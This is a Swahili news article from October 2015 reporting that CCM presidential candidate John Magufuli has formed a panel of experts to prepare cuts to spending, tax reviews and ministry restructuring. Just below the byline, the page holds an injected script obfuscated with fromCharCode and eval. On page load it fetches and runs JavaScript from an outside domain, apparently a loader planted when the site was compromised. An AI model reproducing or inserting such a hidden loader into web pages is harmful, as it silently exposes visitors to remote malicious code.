Recent Comments

Magufuli aanza maandalizi ya mabadiliko makubwa nchini

By NaMwandishiWetu Oct 13, 2015
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

 

 

 

 

MMOJA wa wagombea wa nafasi ya urais wa Jamhuri ya Muungano wa Tanzania, Dokta John Pombe Magufuli, ameunda jopo la wana- taaluma na wataalam katika fani mbalimbali ikiwa ni sehemu ya maandalizi ya mkakati wake wa kufanya mabadiliko makubwa serikalini iwapo atachaguliwa kuongoza nchi.

Dk. Magufuli anawania nafasi ya urais kupitia Chama cha Mapinduzi CCM, chama ambacho kimekuwa madarakani tangu mwaka 1977. Iwapo atachaguliwa, Magufuli atakuwa rais wa awamu ya tano wa Tanzania.

Taarifa iliyotolewa kwa vyombo vya habari nchini na kamati ya kampeni ya mgombea huyo, inasema, jopo hilo linaundwa na watalaam waliobobea katika masuala ya uchumi, biashara, utawala na sheria, elimu ya juu, asasi zisizo za kiserikali pamoja na sekta binafsi.

Kwa mujibu wa taarifa hiyo, Dk. Magufuli amelipa jopo hilo majukumu ya kuchunguza na kupendekeza maeneo ambayo Serikali yake itayafanyia kazi mara baada ya kuingia madarakani.

Taarifa hiyo inalitaja eneo la kwanza ambalo Serikali ya Magufuli inataka lishughulikiwe kuwa ni kubana matumizi, ikiwemo manunuzi ya umma, posho za vikao na matumizi ya magari.

Kadhalika, jopo hilo linatakiwa kuchunguza na kupendekeza maeneo ambayo Serikali itaongeza mapato mara moja mara baada ya Magufuli kuapishwa kuwa rais wa Jamhuri ya Muungano wa Tanzania.

Jopo hilo pia limeagizwa kuchunguza na kutoa mapendekezo kwenye mfumo wa utendaji na utumishi katika serikali.

Kupitia kodi na ushuru wenye usumbufu kwa wafanyabiashara wa ngazi zote, wakulima, wafugaji na wavuvi, ni jukumu lingine ambalo jopo hilo limekabidhiwa.

Aidha, Dk. Magufuli anataka jopo hilo kupitia sheria zote za nchi na kuorodhesha sheria ambazo zinapaswa kubadilishwa haraka ili kuharakisha mabadiliko ya kweli na ya haraka ambayo ameyaahidi kwa Watanzania.

Majukumu mengine ambayo jopo hilo limepewa ni pamoja na kupendekeza miundo na idadi ya Wizara na kutengeneza rasimu za mikataba ya kazi kwa Mawaziri, Makatibu Wakuu na watendaji wengine wakuu ambao Dk. Magufuli atawateua mara baada ya kuapishwa.

Kadhalika jopo hilo limepewa jukumu la kutengeneza njia za haraka za kumaliza kero za watumishi wa umma, hasa walimu, askari, madaktari na wauguzi, ili aanze nao kazi wakiwa na ari na morali ya kusukuma mabadiliko ya kweli.

Kutengeneza rasimu ya mpango kazi wa utekelezaji wa ilani ya CCM na ahadi mbazo Dk. Magufuli alizitoa kwenye kampeni, hasa upatikanaji wa ajira kwa haraka na umeme wa uhakika, ni jukumu lingine ambalo jopo hilo limekabidhiwa.

Kadhalika jopo hilo limepewa jukumu la kupendekeza muundo wa kitaasisi na utaratibu muafaka wa kutekeleza ahadi ya kutoa shilingi milioni 50 za Kitanzania kwa ajili ya kila kijiji na mtaa.

Suala lingine ambalo jopo hilo linatakiwa kushughulikia ni kupitia na kuorodhesha masuala yote na kero zote zinazosubiri maamuzi ya Serikali ili atoe maamuzi kuanzia siku ya kwanza atakapoapishwa.

Uchaguzi mkuu wa rais, wabunge na madiwani, unatarajia kufanyika nchini kote mnamo Oktoba 25 mwaka huu.